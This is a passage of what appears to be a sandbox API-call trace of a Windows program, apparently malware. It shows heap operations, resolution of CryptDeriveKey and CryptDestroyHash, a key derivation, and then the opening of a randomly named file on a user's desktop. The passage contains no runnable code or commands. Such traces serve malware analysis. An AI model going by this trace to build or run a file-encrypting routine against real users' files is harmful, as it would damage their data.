hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0210.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0210.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0210.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0210.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0210.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0210.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0210.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0210.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0210.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0210.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0210.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0210.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0210.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0210.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0210.668] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0210.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ba8 [0210.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0210.668] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0210.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0210.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0210.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0210.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0210.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0210.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0210.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0210.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0210.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0210.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0210.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0210.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0210.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0210.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0210.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0210.670] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0210.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0210.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50aa0 [0210.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0210.670] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0210.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0210.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0210.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0210.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0210.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0210.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0210.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0210.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0210.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0210.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0210.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0210.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0210.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0210.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0210.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0210.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0210.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0210.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0210.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0210.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0210.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0210.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0210.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0210.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0210.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0210.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0210.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0210.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0210.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0210.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0210.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0210.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0210.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0210.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0210.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0210.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0210.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0210.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0210.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0210.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0210.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0210.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50a28, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0210.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0210.749] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0210.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0210.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.750] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87050, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87350) returned 1 [0210.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0210.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.750] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0210.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.750] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0210.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0210.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0210.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0210.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0210.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0210.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0210.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0210.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0210.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0210.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0210.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0210.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0210.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e698c8 [0210.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e698c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0210.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0210.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0210.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0210.752] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0210.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0210.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0210.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0210.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0210.752] CryptDestroyHash (hHash=0xa87050) returned 1 [0210.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0210.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0210.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0210.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0210.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0210.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0210.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0210.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0210.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0210.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0210.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0210.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0210.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0210.753] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0210.754] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.754] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.754] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0210.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0210.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0210.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0210.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0210.755] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/wg77xQT1-Aj18nXa8K.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\wg77xqt1-aj18nxa8k.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 